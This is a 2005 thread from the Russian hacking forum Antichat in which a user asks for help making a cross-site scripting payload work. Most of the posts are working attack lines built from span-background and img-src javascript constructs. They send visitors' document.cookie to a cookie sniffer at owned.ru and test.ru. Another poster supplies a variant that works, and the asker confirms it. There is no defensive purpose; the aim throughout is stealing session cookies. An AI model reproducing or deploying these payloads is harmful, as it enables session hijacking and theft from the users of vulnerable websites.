Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Правильный запрос к javascript (https://forum.antichat.xyz/showthread.php?t=9874)

Kond4r 06.10.2005 03:44
Правильный запрос к javascript
 
Ни как ни могу коректно составить запрос javascript

нужно чтоб работало вот это:

<span style=background:url(javascript:document.images[1].src="http://owned.ru/snif.php?"+document.cookie) > </span>

всё перепробовал, ну ни как не получается...

Был совет сделать такой запрос

<span style=background:url("http://owned.ru/snif.php?"+document.cookie) > </span>

В принципе он работает, но по понятным причинам куки не передаёт....

Сразу скажу, что

<script>img = new Image(); img.src =" http://owned.ru/snif.php?"+document.cookie;</script>

пашет отлично....

ЗЫ:

кстати алерт в
<span style=background:url(javascript:alert())> </span>
выводился у меня токо в какой-то старой версии explorera


Заранее спасибо за либую инфу!

Morph 07.10.2005 06:09
А у тя какой браузер?
Данный код посути должен работать в ИЕ.
В остальных нет.

Kond4r 07.10.2005 12:35
пробовал в ie70, mozzila 1.7.8, opera7.0 - не работает

нарыл какой-то smartexplorer 1.1.8 - там работает токо

<span style=background:url(javascript:alert())><span>

но если написать

<span style=background:url(document.images[1].src="http://test.ru/snif.php?"+document.cookie)></span>

он выдаёт критическую ошибку и вылетает(((

Нашёл в инете, что это должно работать в
Applied By

Win IE 5.0 - 6.x
OSX IE 5.x
Mac IE 4.0 - 5.x
Mac IE 4.0 may show a "low system memory" message.

Win Opera 7.0 - 7.x
MSN for OSX
OSX iCab 2.x

Not Applied By

All Mozilla 0.6 - 1.6
Win IE 4.0
All NS 4.05 - 4.x
Win Opera 3.5 - 6.x
OSX/Mac Opera 5.0 - 6.x
OSX Safari 1.x
Konqueror 2.2 - 3.x

согласно этому в Opere 7.0 работать должно, но повторюсь: непашет....

В чём дело?

bul666 07.10.2005 12:40
Можно через IMG/// <img src=[JAVASCRIPT]>

Kond4r 07.10.2005 12:52
пробовал тоже самое....

Есть идея передать переменную document.cookie после ввода адреса снифа:

<span style=background:url("http://test.ru/snif.php?"+document.cookie)></span>

Снифер запускается (наконец-то), но передаётся в него не значение кукисов, а как раз то что написано далее: \"+document.cookie

пробовал писать

<span style=background:url("http://test.ru/snif.php?"+javascript:document.write(document.cook ie))></span>

передаётся \"+javascript:document.write(document.cookie)

Помогите очень прошу!

bul666 07.10.2005 12:56
А порчему именно Span ???

Kond4r 07.10.2005 13:04
да мона и <img src....>
Всё перепробовал. не работает

bul666 07.10.2005 13:09
Цитата:
Сообщение от Kond4r
да мона и <img src....>
Всё перепробовал. не работает
Попробуй так:

<img src="javascript:img = new Image(); img.src ='http://owned.ru/snif.php?'+document.cookie;">

Kond4r 07.10.2005 13:28
Заработало!!!)))))
Прада токо в smartexplorer
В IE7.0 не работает
В Mozzile не передаётся document.cookie

Спасибо огромное...
Дальше я сам наверно разберусь.
Хотя если есть какие-то идеи буду признателен.
>bull666
Огромное спасибо!

Kond4r 07.10.2005 21:15
было дело


Всем спасибо сам намыл инфу.... Всё работает и <span> в том числе.)))


Время: 22:55